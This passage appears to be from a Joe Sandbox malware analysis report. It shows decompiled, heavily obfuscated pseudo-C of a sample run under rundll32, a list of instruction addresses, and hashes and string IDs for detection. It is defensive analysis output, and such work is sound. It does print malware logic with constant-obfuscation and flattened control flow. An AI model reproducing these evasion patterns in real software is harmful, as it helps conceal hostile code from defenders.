				_v300 = _v300 << 7;
				_v300 = _v300 ^ 0x75f4cdbc;
				_v204 = 0xc71fe4;
				_v204 = _v204 ^ 0x39f608ad;
				_v204 = _v204 ^ 0x39346367;
				_v332 = 0x26340b;
				_t742 = 0xc;
				_v332 = _v332 / _t742;
				_v332 = _v332 >> 0xc;
				_v332 = _v332 + 0x4006;
				_v332 = _v332 ^ 0x00056ca9;
				_v244 = 0xb4bdd0;
				_v244 = _v244 ^ 0x9dcc8204;
				_t743 = 0x5c;
				_v244 = _v244 * 0x56;
				_v244 = _v244 ^ 0xe668140d;
				_v228 = 0xb7abf;
				_v228 = _v228 ^ 0x8d46dccd;
				_v228 = _v228 / _t743;
				_v228 = _v228 ^ 0x0183fb21;
				_v132 = 0x744574;
				_t744 = 0x2d;
				_v132 = _v132 * 0x27;
				_v132 = _v132 ^ 0x11b9ba9e;
				_v384 = 0x4471dc;
				_v384 = _v384 ^ 0x8273491f;
				_v384 = _v384 / _t744;
				_v384 = _v384 + 0xffffe0da;
				_v384 = _v384 ^ 0x02e26e3a;
				_v324 = 0x605f40;
				_v324 = _v324 + 0xffffce94;
				_v324 = _v324 + 0xffff95c1;
				_v324 = _v324 >> 6;
				_v324 = _v324 ^ 0x0001f278;
				_v380 = 0xfa4dc1;
				_t745 = 0x17;
				_v380 = _v380 * 0x71;
				_v380 = _v380 ^ 0x12ce666f;
				_v380 = _v380 | 0xc76ff931;
				_v380 = _v380 ^ 0xfff34e85;
				_v172 = 0xf73d33;
				_v172 = _v172 >> 7;
				_v172 = _v172 ^ 0x0001a374;
				_v364 = 0xb38f71;
				_v364 = _v364 + 0x4143;
				_v364 = _v364 ^ 0x53c53aac;
				_v364 = _v364 / _t745;
				_v364 = _v364 ^ 0x03acc109;
				_v260 = 0xa91f99;
				_v260 = _v260 >> 0xa;
				_v260 = _v260 ^ 0xc9224c65;
				_v260 = _v260 ^ 0xc926367a;
				_v284 = 0x5ea8fe;
				_v284 = _v284 * 0x3e;
				_v284 = _v284 | 0x757fbe3f;
				_v284 = _v284 ^ 0x77fedad5;
				_v264 = 0xc1651a;
				_v264 = _v264 / _t745;
				_v264 = _v264 + 0x650c;
				_v264 = _v264 ^ 0x00066731;
				_v372 = 0xd53751;
				_v372 = _v372 >> 0x10;
				_v372 = _v372 * 0x50;
				_v372 = _v372 ^ 0xc5a53504;
				_v372 = _v372 ^ 0xc5a85656;
				_v220 = 0x28743;
				_v220 = _v220 | 0x747e4fe0;
				_v220 = _v220 >> 8;
				_v220 = _v220 ^ 0x0078aec3;
				_v356 = 0x673303;
				_v356 = _v356 + 0xffff3afb;
				_v356 = _v356 >> 2;
				_t746 = 0x76;
				_t842 = 0x6cd454e;
				_v96 = 0x100;
				_t840 = 0xcf5796f;
				_v356 = _v356 * 9;
				_v356 = _v356 ^ 0x00e12344;
				_v232 = 0xe5489f;
				_v232 = _v232 * 0x62;
				_v232 = _v232 ^ 0x422e6763;
				_v232 = _v232 ^ 0x15e3beef;
				_v144 = 0x9d1c0d;
				_v144 = _v144 | 0x5a9db401;
				_v144 = _v144 ^ 0x5a9ceaa6;
				_v328 = 0xaba5b0;
				_v328 = _v328 + 0xfc55;
				_v328 = _v328 * 0x37;
				_v328 = _v328 * 0x78;
				_v328 = _v328 ^ 0x62b938e2;
				_v168 = 0x51360e;
				_v168 = _v168 << 2;
				_v168 = _v168 ^ 0x014a45e2;
				_v176 = 0x11fbeb;
				_v176 = _v176 << 0xa;
				_v176 = _v176 ^ 0x47e89d0f;
				_v216 = 0x8fcc87;
				_v216 = _v216 / _t746;
				_v216 = _v216 ^ 0xd2cd5e41;
				_v216 = _v216 ^ 0xd2c9cc36;
				_v184 = 0x8a666a;
				_v184 = _v184 * 0x6c;
				_v184 = _v184 ^ 0x3a66624b;
				_v288 = 0x12fc4d;
				_v288 = _v288 ^ 0x84b68421;
				_v288 = _v288 * 0x77;
				_v288 = _v288 ^ 0xa87aad10;
				_v296 = 0xb3f337;
				_v296 = _v296 >> 1;
				_v296 = _v296 + 0xffffa2d0;
				_v296 = _v296 + 0xffff98aa;
				_v296 = _v296 ^ 0x0050e375;
				_v160 = 0xa98b94;
				_v160 = _v160 ^ 0x93f8baf3;
				_v160 = _v160 ^ 0x935506dc;
				_v208 = 0xd26eef;
				_v208 = _v208 + 0xffff657d;
				_v208 = _v208 << 5;
				_v208 = _v208 ^ 0x1a3ecca6;
				_v280 = 0xce1cc4;
				_v280 = _v280 << 6;
				_v280 = _v280 << 0x10;
				_v280 = _v280 | 0xb3a7eb9b;
				_v280 = _v280 ^ 0xb3a418cd;
				while(1) {
					L1:
					_t747 = 0xb34e23f;
					while(1) {
						L2:
						while(1) {
							L3:
							_t690 = 0xa0b11f8;
							do {
								while(1) {
									L4:
									_t850 = _t725 - _t690;
									if(_t850 > 0) {
										break;
									}
									if(_t850 == 0) {
										_t700 = E002D4624(_v224, _v108, _v232, _v144,  &_v112, _v328, _v120);
										_t847 = _t847 + 0x14;
										__eflags = _t700;
										_t747 = 0xb34e23f;
										_t725 =  ==  ? 0xb34e23f : 0xcc5fcc9;
										goto L2;
									} else {
										if(_t725 == 0x24fa5ba) {
											_push(_v212);
											_push(_v156);
											_t701 = E002DDCF7(_v376, 0x2c1984, __eflags);
											_push(_v236);
											_push(_v124);
											_t704 = E002C9462(_t701, _v368,  &_v116, E002DDCF7(_v268, 0x2c1814, __eflags), _v256, _v136);
											_t847 = _t847 + 0x24;
											__eflags = _t704 - _v240;
											_t725 =  ==  ? 0xec78b05 : 0xc75135f;
											E002CA8B0(_v352, _t701, _v360);
											E002CA8B0(_v336, _t702, _v344);
											_t840 = 0xcf5796f;
											goto L13;
										} else {
											if(_t725 == 0x505fe8e) {
												_t631 =  &_v208; // 0x39346367
												E002C957D(_v116, _v160,  *_t631, _v272, _v280);
											} else {
												if(_t725 == _t842) {
													_push(_v340);
													_push(_v180);
													_t710 = E002DDCF7(_v148, 0x2c1854, __eflags);
													_pop(_t763);
													_t844 = _t710;
													_t711 = 0x48;
													_v104 = _t711;
													_t713 = E002C1C45(_v120,  &_v104,  &_v76, _v252, _v140, _v300, _v204, _t710, _v332, _v276, _t763, _t711);
													_t847 = _t847 + 0x28;
													__eflags = _t713 - _v164;
													if(_t713 != _v164) {
														_t725 = _t840;
													} else {
														_t834 =  *0x2e3dfc; // 0x0
														E002CED7E(_v244, _t834, _v228,  &_v68, 0x40);
														_t847 = _t847 + 0xc;
														_t725 = 0x9bcfe4f;
													}
													E002CA8B0(_v132, _t844, _v384);
													goto L13;
												} else {
													if(_t725 == 0x7252bf3) {
														_t725 = 0x24fa5ba;
														continue;
													} else {
														if(_t725 == _t819) {
															_t717 = E002CB144(_v120, _v188, _v308, _v128, _v348, _v292);
															_t847 = _t847 + 0x10;
															__eflags = _t717 - _v152;
															_t725 =  ==  ? _t842 : _t840;
															while(1) {
																L1:
																_t747 = 0xb34e23f;
																L2:
																L3:
																_t690 = 0xa0b11f8;
																goto L4;
															}
														} else {
															_t856 = _t725 - 0x9bcfe4f;
															if(_t725 == 0x9bcfe4f) {
																_push(_v172);
																_push(_v380);
																_t719 = E002DDCF7(_v324, 0x2c1854, _t856);
																_pop(_t772);
																E002CAA4D(_v364, _t719,  *((intOrPtr*)(_v100 + 4)), _v284, _v196, _v116,  &_v108, _v264, _t772,  *_v100, _v372);
																_t725 =  ==  ? 0xa0b11f8 : _t840;
																E002CA8B0(_v220, _t719, _v356);
																_t847 = _t847 + 0x2c;
																L13:
																_t842 = 0x6cd454e;
																L32:
																_t819 = 0x9b01f0f;
																_t747 = 0xb34e23f;
																_t690 = 0xa0b11f8;
															}
															goto L33;
														}
													}
												}
											}
										}
									}
									L36:
									return _t846;
								}
								__eflags = _t725 - _t747;
								if(_t725 == _t747) {
									_t691 = E002C2BD9(_v112);
									_t725 = 0xb500bcf;
									__eflags = _t691;
									_t846 =  !=  ? 1 : _t846;
									goto L32;
								} else {
									__eflags = _t725 - 0xb500bcf;
									if(_t725 == 0xb500bcf) {
										E002DCA69(_v112, _v168, _v176);
										_t725 = 0xcc5fcc9;
										goto L1;
									} else {
										__eflags = _t725 - 0xcc5fcc9;
										if(_t725 == 0xcc5fcc9) {
											E002CA958(_v216, _v108, _v184);
											_t725 = _t840;
											while(1) {
												L1:
												_t747 = 0xb34e23f;
												goto L2;
											}
										} else {
											__eflags = _t725 - _t840;
											if(_t725 == _t840) {
												E002CA958(_v288, _v120, _v296);
												_t725 = 0x505fe8e;
												while(1) {
													L1:
													_t747 = 0xb34e23f;
													goto L2;
												}
											} else {
												__eflags = _t725 - 0xec78b05;
												if(__eflags != 0) {
													goto L33;
												} else {
													_v104 = _v96;
													_t697 = E002C92C7(_v200, _v96, _v304, _v312,  &_v120, _v116, _v320);
													_t847 = _t847 + 0x14;
													__eflags = _t697 - _v192;
													_t819 = 0x9b01f0f;
													_t747 = 0xb34e23f;
													_t725 =  ==  ? 0x9b01f0f : 0x505fe8e;
													goto L3;
												}
											}
										}
									}
								}
								goto L36;
								L33:
							} while (_t725 != 0xc75135f);
							goto L36;
						}
					}
				}
			}





















































































































                                                                                                                                    0x002cbb84
                                                                                                                                    0x002cbb9c
                                                                                                                                    0x002cbba3
                                                                                                                                    0x002cbba8
                                                                                                                                    0x002cbbab
                                                                                                                                    0x002cbbac
                                                                                                                                    0x002cbbae
                                                                                                                                    0x002cbbb3
                                                                                                                                    0x002cbbb4
                                                                                                                                    0x002cbbc7
                                                                                                                                    0x002cbbce
                                                                                                                                    0x002cbbd9
                                                                                                                                    0x002cbbe4
                                                                                                                                    0x002cbbf4
                                                                                                                                    0x002cbbfb
                                                                                                                                    0x002cbc06
                                                                                                                                    0x002cbc0e
                                                                                                                                    0x002cbc1b
                                                                                                                                    0x002cbc1f
                                                                                                                                    0x002cbc27
                                                                                                                                    0x002cbc2f
                                                                                                                                    0x002cbc3a
                                                                                                                                    0x002cbc42
                                                                                                                                    0x002cbc49
                                                                                                                                    0x002cbc54
                                                                                                                                    0x002cbc5c
                                                                                                                                    0x002cbc64
                                                                                                                                    0x002cbc69
                                                                                                                                    0x002cbc71
                                                                                                                                    0x002cbc79
                                                                                                                                    0x002cbc84
                                                                                                                                    0x002cbc8f
                                                                                                                                    0x002cbc9a
                                                                                                                                    0x002cbca5
                                                                                                                                    0x002cbcad
                                                                                                                                    0x002cbcc3
                                                                                                                                    0x002cbcca
                                                                                                                                    0x002cbcd5
                                                                                                                                    0x002cbce7
                                                                                                                                    0x002cbcec
                                                                                                                                    0x002cbcf5
                                                                                                                                    0x002cbd00
                                                                                                                                    0x002cbd0b
                                                                                                                                    0x002cbd16
                                                                                                                                    0x002cbd21
                                                                                                                                    0x002cbd29
                                                                                                                                    0x002cbd36
                                                                                                                                    0x002cbd39
                                                                                                                                    0x002cbd3d
                                                                                                                                    0x002cbd45
                                                                                                                                    0x002cbd4d
                                                                                                                                    0x002cbd58
                                                                                                                                    0x002cbd63
                                                                                                                                    0x002cbd6e
                                                                                                                                    0x002cbd79
                                                                                                                                    0x002cbd8f
                                                                                                                                    0x002cbd9d
                                                                                                                                    0x002cbda2
                                                                                                                                    0x002cbdab
                                                                                                                                    0x002cbdb6
                                                                                                                                    0x002cbdc1
                                                                                                                                    0x002cbdc9
                                                                                                                                    0x002cbdd1
                                                                                                                                    0x002cbdd9
                                                                                                                                    0x002cbde1
                                                                                                                                    0x002cbde9
                                                                                                                                    0x002cbdf4
                                                                                                                                    0x002cbdfb
                                                                                                                                    0x002cbe06
                                                                                                                                    0x002cbe11
                                                                                                                                    0x002cbe1c
                                                                                                                                    0x002cbe27
                                                                                                                                    0x002cbe32
                                                                                                                                    0x002cbe3d
                                                                                                                                    0x002cbe48
                                                                                                                                    0x002cbe53
                                                                                                                                    0x002cbe5e
                                                                                                                                    0x002cbe69
                                                                                                                                    0x002cbe74
                                                                                                                                    0x002cbe7f
                                                                                                                                    0x002cbe92
                                                                                                                                    0x002cbe95
                                                                                                                                    0x002cbe9c
                                                                                                                                    0x002cbea4
                                                                                                                                    0x002cbeaf
                                                                                                                                    0x002cbec5
                                                                                                                                    0x002cbecc
                                                                                                                                    0x002cbed7
                                                                                                                                    0x002cbee2
                                                                                                                                    0x002cbeea
                                                                                                                                    0x002cbef2
                                                                                                                                    0x002cbeff
                                                                                                                                    0x002cbf02
                                                                                                                                    0x002cbf06
                                                                                                                                    0x002cbf0e
                                                                                                                                    0x002cbf19
                                                                                                                                    0x002cbf24
                                                                                                                                    0x002cbf2b
                                                                                                                                    0x002cbf36
                                                                                                                                    0x002cbf3e
                                                                                                                                    0x002cbf43
                                                                                                                                    0x002cbf4b
                                                                                                                                    0x002cbf53
                                                                                                                                    0x002cbf5b
                                                                                                                                    0x002cbf63
                                                                                                                                    0x002cbf6b
                                                                                                                                    0x002cbf78
                                                                                                                                    0x002cbf7c
                                                                                                                                    0x002cbf84
                                                                                                                                    0x002cbf90
                                                                                                                                    0x002cbf93
                                                                                                                                    0x002cbf97
                                                                                                                                    0x002cbf9f
                                                                                                                                    0x002cbfa7
                                                                                                                                    0x002cbfaf
                                                                                                                                    0x002cbfbc
                                                                                                                                    0x002cbfc0
                                                                                                                                    0x002cbfc8
                                                                                                                                    0x002cbfcd
                                                                                                                                    0x002cbfd5
                                                                                                                                    0x002cbfe0
                                                                                                                                    0x002cbfeb
                                                                                                                                    0x002cbff8
                                                                                                                                    0x002cc007
                                                                                                                                    0x002cc00a
                                                                                                                                    0x002cc00e
                                                                                                                                    0x002cc013
                                                                                                                                    0x002cc01b
                                                                                                                                    0x002cc023
                                                                                                                                    0x002cc033
                                                                                                                                    0x002cc037
                                                                                                                                    0x002cc03c
                                                                                                                                    0x002cc044
                                                                                                                                    0x002cc04c
                                                                                                                                    0x002cc05f
                                                                                                                                    0x002cc062
                                                                                                                                    0x002cc069
                                                                                                                                    0x002cc074
                                                                                                                                    0x002cc07f
                                                                                                                                    0x002cc08a
                                                                                                                                    0x002cc095
                                                                                                                                    0x002cc0a2
                                                                                                                                    0x002cc0a6
                                                                                                                                    0x002cc0ae
                                                                                                                                    0x002cc0b6
                                                                                                                                    0x002cc0be
                                                                                                                                    0x002cc0c6
                                                                                                                                    0x002cc0ce
                                                                                                                                    0x002cc0d6
                                                                                                                                    0x002cc0de
                                                                                                                                    0x002cc0e6
                                                                                                                                    0x002cc0f1
                                                                                                                                    0x002cc0fc
                                                                                                                                    0x002cc107
                                                                                                                                    0x002cc112
                                                                                                                                    0x002cc11d
                                                                                                                                    0x002cc124
                                                                                                                                    0x002cc12f
                                                                                                                                    0x002cc137
                                                                                                                                    0x002cc13f
                                                                                                                                    0x002cc147
                                                                                                                                    0x002cc14c
                                                                                                                                    0x002cc154
                                                                                                                                    0x002cc166
                                                                                                                                    0x002cc16b
                                                                                                                                    0x002cc174
                                                                                                                                    0x002cc17f
                                                                                                                                    0x002cc18a
                                                                                                                                    0x002cc195
                                                                                                                                    0x002cc19d
                                                                                                                                    0x002cc1a8
                                                                                                                                    0x002cc1b0
                                                                                                                                    0x002cc1b8
                                                                                                                                    0x002cc1c0
                                                                                                                                    0x002cc1c5
                                                                                                                                    0x002cc1cd
                                                                                                                                    0x002cc1d8
                                                                                                                                    0x002cc1e3
                                                                                                                                    0x002cc1ee
                                                                                                                                    0x002cc1fa
                                                                                                                                    0x002cc1fd
                                                                                                                                    0x002cc201
                                                                                                                                    0x002cc206
                                                                                                                                    0x002cc20e
                                                                                                                                    0x002cc216
                                                                                                                                    0x002cc223
                                                                                                                                    0x002cc238
                                                                                                                                    0x002cc23b
                                                                                                                                    0x002cc242
                                                                                                                                    0x002cc24d
                                                                                                                                    0x002cc258
                                                                                                                                    0x002cc26e
                                                                                                                                    0x002cc275
                                                                                                                                    0x002cc280
                                                                                                                                    0x002cc293
                                                                                                                                    0x002cc296
                                                                                                                                    0x002cc29d
                                                                                                                                    0x002cc2a8
                                                                                                                                    0x002cc2b0
                                                                                                                                    0x002cc2c0
                                                                                                                                    0x002cc2c4
                                                                                                                                    0x002cc2cc
                                                                                                                                    0x002cc2d4
                                                                                                                                    0x002cc2dc
                                                                                                                                    0x002cc2e4
                                                                                                                                    0x002cc2ec
                                                                                                                                    0x002cc2f1
                                                                                                                                    0x002cc2f9
                                                                                                                                    0x002cc306
                                                                                                                                    0x002cc307
                                                                                                                                    0x002cc30b
                                                                                                                                    0x002cc313
                                                                                                                                    0x002cc31b
                                                                                                                                    0x002cc323
                                                                                                                                    0x002cc32e
                                                                                                                                    0x002cc336
                                                                                                                                    0x002cc341
                                                                                                                                    0x002cc349
                                                                                                                                    0x002cc351
                                                                                                                                    0x002cc361
                                                                                                                                    0x002cc365
                                                                                                                                    0x002cc36d
                                                                                                                                    0x002cc378
                                                                                                                                    0x002cc380
                                                                                                                                    0x002cc38b
                                                                                                                                    0x002cc396
                                                                                                                                    0x002cc3a3
                                                                                                                                    0x002cc3a7
                                                                                                                                    0x002cc3af
                                                                                                                                    0x002cc3b7
                                                                                                                                    0x002cc3cb
                                                                                                                                    0x002cc3d2
                                                                                                                                    0x002cc3dd
                                                                                                                                    0x002cc3e8
                                                                                                                                    0x002cc3f0
                                                                                                                                    0x002cc3fa
                                                                                                                                    0x002cc3fe
                                                                                                                                    0x002cc406
                                                                                                                                    0x002cc40e
                                                                                                                                    0x002cc419
                                                                                                                                    0x002cc424
                                                                                                                                    0x002cc42c
                                                                                                                                    0x002cc437
                                                                                                                                    0x002cc43f
                                                                                                                                    0x002cc447
                                                                                                                                    0x002cc455
                                                                                                                                    0x002cc456
                                                                                                                                    0x002cc45b
                                                                                                                                    0x002cc466
                                                                                                                                    0x002cc46b
                                                                                                                                    0x002cc46f
                                                                                                                                    0x002cc477
                                                                                                                                    0x002cc48a
                                                                                                                                    0x002cc491
                                                                                                                                    0x002cc49c
                                                                                                                                    0x002cc4a7
                                                                                                                                    0x002cc4b2
                                                                                                                                    0x002cc4bd
                                                                                                                                    0x002cc4c8
                                                                                                                                    0x002cc4d0
                                                                                                                                    0x002cc4dd
                                                                                                                                    0x002cc4e6
                                                                                                                                    0x002cc4ea
                                                                                                                                    0x002cc4f2
                                                                                                                                    0x002cc4fd
                                                                                                                                    0x002cc505
                                                                                                                                    0x002cc510
                                                                                                                                    0x002cc51b
                                                                                                                                    0x002cc523
                                                                                                                                    0x002cc52e
                                                                                                                                    0x002cc542
                                                                                                                                    0x002cc549
                                                                                                                                    0x002cc554
                                                                                                                                    0x002cc55f
                                                                                                                                    0x002cc572
                                                                                                                                    0x002cc579
                                                                                                                                    0x002cc584
                                                                                                                                    0x002cc594
                                                                                                                                    0x002cc5a1
                                                                                                                                    0x002cc5a5
                                                                                                                                    0x002cc5ad
                                                                                                                                    0x002cc5b5
                                                                                                                                    0x002cc5b9
                                                                                                                                    0x002cc5c1
                                                                                                                                    0x002cc5c9
                                                                                                                                    0x002cc5d1
                                                                                                                                    0x002cc5dc
                                                                                                                                    0x002cc5e7
                                                                                                                                    0x002cc5f2
                                                                                                                                    0x002cc5fd
                                                                                                                                    0x002cc608
                                                                                                                                    0x002cc610
                                                                                                                                    0x002cc61b
                                                                                                                                    0x002cc623
                                                                                                                                    0x002cc628
                                                                                                                                    0x002cc62d
                                                                                                                                    0x002cc635
                                                                                                                                    0x002cc63d
                                                                                                                                    0x002cc63d
                                                                                                                                    0x002cc63d
                                                                                                                                    0x002cc642
                                                                                                                                    0x002cc642
                                                                                                                                    0x002cc647
                                                                                                                                    0x002cc647
                                                                                                                                    0x002cc647
                                                                                                                                    0x002cc64c
                                                                                                                                    0x002cc64c
                                                                                                                                    0x002cc64c
                                                                                                                                    0x002cc64c
                                                                                                                                    0x002cc64e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cc654
                                                                                                                                    0x002cc917
                                                                                                                                    0x002cc91c
                                                                                                                                    0x002cc924
                                                                                                                                    0x002cc926
                                                                                                                                    0x002cc92b
                                                                                                                                    0x00000000
                                                                                                                                    0x002cc65a
                                                                                                                                    0x002cc660
                                                                                                                                    0x002cc83b
                                                                                                                                    0x002cc847
                                                                                                                                    0x002cc852
                                                                                                                                    0x002cc857
                                                                                                                                    0x002cc865
                                                                                                                                    0x002cc89e
                                                                                                                                    0x002cc8a5
                                                                                                                                    0x002cc8b4
                                                                                                                                    0x002cc8c5
                                                                                                                                    0x002cc8c8
                                                                                                                                    0x002cc8d8
                                                                                                                                    0x002cc8de
                                                                                                                                    0x00000000
                                                                                                                                    0x002cc666
                                                                                                                                    0x002cc66c
                                                                                                                                    0x002cca66
                                                                                                                                    0x002cca7b
                                                                                                                                    0x002cc672
                                                                                                                                    0x002cc674
                                                                                                                                    0x002cc779
                                                                                                                                    0x002cc782
                                                                                                                                    0x002cc790
                                                                                                                                    0x002cc796
                                                                                                                                    0x002cc799
                                                                                                                                    0x002cc7a2
                                                                                                                                    0x002cc7ac
                                                                                                                                    0x002cc7e3
                                                                                                                                    0x002cc7e8
                                                                                                                                    0x002cc7eb
                                                                                                                                    0x002cc7f2
                                                                                                                                    0x002cc821
                                                                                                                                    0x002cc7f4
                                                                                                                                    0x002cc805
                                                                                                                                    0x002cc812
                                                                                                                                    0x002cc817
                                                                                                                                    0x002cc81a
                                                                                                                                    0x002cc81a
                                                                                                                                    0x002cc830
                                                                                                                                    0x00000000
                                                                                                                                    0x002cc67a
                                                                                                                                    0x002cc680
                                                                                                                                    0x002cc76f
                                                                                                                                    0x00000000
                                                                                                                                    0x002cc686
                                                                                                                                    0x002cc688
                                                                                                                                    0x002cc752
                                                                                                                                    0x002cc759
                                                                                                                                    0x002cc765
                                                                                                                                    0x002cc767
                                                                                                                                    0x002cc63d
                                                                                                                                    0x002cc63d
                                                                                                                                    0x002cc63d
                                                                                                                                    0x002cc642
                                                                                                                                    0x002cc647
                                                                                                                                    0x002cc647
                                                                                                                                    0x00000000
                                                                                                                                    0x002cc647
                                                                                                                                    0x002cc68e
                                                                                                                                    0x002cc68e
                                                                                                                                    0x002cc694
                                                                                                                                    0x002cc69a
                                                                                                                                    0x002cc6a6
                                                                                                                                    0x002cc6ae
                                                                                                                                    0x002cc6b4
                                                                                                                                    0x002cc6f8
                                                                                                                                    0x002cc71c
                                                                                                                                    0x002cc71f
                                                                                                                                    0x002cc724
                                                                                                                                    0x002cc727
                                                                                                                                    0x002cc727
                                                                                                                                    0x002cca3e
                                                                                                                                    0x002cca3e
                                                                                                                                    0x002cca43
                                                                                                                                    0x002cca48
                                                                                                                                    0x002cca48
                                                                                                                                    0x00000000
                                                                                                                                    0x002cc694
                                                                                                                                    0x002cc688
                                                                                                                                    0x002cc680
                                                                                                                                    0x002cc674
                                                                                                                                    0x002cc66c
                                                                                                                                    0x002cc660
                                                                                                                                    0x002cca85
                                                                                                                                    0x002cca8f
                                                                                                                                    0x002cca8f
                                                                                                                                    0x002cc933
                                                                                                                                    0x002cc935
                                                                                                                                    0x002cca2c
                                                                                                                                    0x002cca33
                                                                                                                                    0x002cca39
                                                                                                                                    0x002cca3b
                                                                                                                                    0x00000000
                                                                                                                                    0x002cc93b
                                                                                                                                    0x002cc93b
                                                                                                                                    0x002cc941
                                                                                                                                    0x002cca15
                                                                                                                                    0x002cca1b
                                                                                                                                    0x00000000
                                                                                                                                    0x002cc947
                                                                                                                                    0x002cc947
                                                                                                                                    0x002cc94d
                                                                                                                                    0x002cc9f3
                                                                                                                                    0x002cc9f9
                                                                                                                                    0x002cc63d
                                                                                                                                    0x002cc63d
                                                                                                                                    0x002cc63d
                                                                                                                                    0x00000000
                                                                                                                                    0x002cc63d
                                                                                                                                    0x002cc953
                                                                                                                                    0x002cc953
                                                                                                                                    0x002cc955
                                                                                                                                    0x002cc9ce
                                                                                                                                    0x002cc9d4
                                                                                                                                    0x002cc63d
                                                                                                                                    0x002cc63d
                                                                                                                                    0x002cc63d
                                                                                                                                    0x00000000
                                                                                                                                    0x002cc63d
                                                                                                                                    0x002cc957
                                                                                                                                    0x002cc957
                                                                                                                                    0x002cc95d
                                                                                                                                    0x00000000
                                                                                                                                    0x002cc963
                                                                                                                                    0x002cc97c
                                                                                                                                    0x002cc995
                                                                                                                                    0x002cc99c
                                                                                                                                    0x002cc9ab
                                                                                                                                    0x002cc9ad
                                                                                                                                    0x002cc9b2
                                                                                                                                    0x002cc9b7
                                                                                                                                    0x00000000
                                                                                                                                    0x002cc9b7
                                                                                                                                    0x002cc95d
                                                                                                                                    0x002cc955
                                                                                                                                    0x002cc94d
                                                                                                                                    0x002cc941
                                                                                                                                    0x00000000
                                                                                                                                    0x002cca4d
                                                                                                                                    0x002cca4d
                                                                                                                                    0x00000000
                                                                                                                                    0x002cca59
                                                                                                                                    0x002cc647
                                                                                                                                    0x002cc642

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ;<=$@_`$CA$D#$Kbf:$PB5$Y/c$cg.B$e($gc49$ll~$sJ$tEt$uP$vj$O~t$iS$ja*
                                                                                                                                    • API String ID: 0-258179307
                                                                                                                                    • Opcode ID: 20a6a9f1ae551115a229d5136a93862dac37af99b15aaec216373bd8da355180
                                                                                                                                    • Instruction ID: e7aefd3469c430ac1c7d2a64dfa0a2338408047a971dda431a66e897178fac5c
                                                                                                                                    • Opcode Fuzzy Hash: 20a6a9f1ae551115a229d5136a93862dac37af99b15aaec216373bd8da355180
                                                                                                                                    • Instruction Fuzzy Hash: C272E1715193819FD378CF25C58AB9BBBE2BBC4304F20891DE6DA86260D7B18959CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D4B87 Relevance: 23.1, Strings: 18, Instructions: 604COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E002D4B87(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				signed int _v2608;
				intOrPtr _v2612;
				intOrPtr _v2616;
				intOrPtr _v2620;
				intOrPtr _v2624;
				char _v2628;
				intOrPtr _v2632;
				char _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				signed int _v2928;
				void* _t703;
				void* _t707;
				signed int _t708;
				signed int _t717;
				void* _t730;
				void* _t736;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				void* _t758;
				signed int _t798;
				void* _t803;
				void* _t804;
				void* _t811;

				_v2608 = _v2608 & 0x00000000;
				_v2616 = 0xa2c333;
				_v2612 = 0xd97943;
				_v2696 = 0x74b91;
				_v2696 = _v2696 + 0xffffab65;
				_v2696 = _v2696 ^ 0x0006f6df;
				_v2804 = 0x130b03;
				_v2804 = _v2804 << 9;
				_v2804 = _v2804 + 0x8374;
				_v2804 = _v2804 ^ 0x26068974;
				_v2876 = 0x240a80;
				_v2876 = _v2876 >> 6;
				_v2876 = _v2876 >> 5;
				_v2876 = _v2876 ^ 0x3e269fec;
				_v2876 = _v2876 ^ 0x3e253447;
				_v2924 = 0x49db5b;
				_v2924 = _v2924 + 0xd552;
				_t803 = __ecx;
				_t798 = 0xce4571;
				_t738 = 0x27;
				_v2924 = _v2924 / _t738;
				_v2924 = _v2924 + 0x3019;
				_v2924 = _v2924 ^ 0x0006d24f;
				_v2796 = 0xf8ea63;
				_v2796 = _v2796 << 3;
				_v2796 = _v2796 + 0x8798;
				_v2796 = _v2796 ^ 0x07c9cae5;
				_v2864 = 0x679d3b;
				_t739 = 0x25;
				_v2864 = _v2864 * 0x7a;
				_v2864 = _v2864 / _t739;
				_v2864 = _v2864 << 0xc;
				_v2864 = _v2864 ^ 0x5a5eda92;
				_v2688 = 0xbc1f25;
				_v2688 = _v2688 << 0xd;
				_v2688 = _v2688 ^ 0x83e15555;
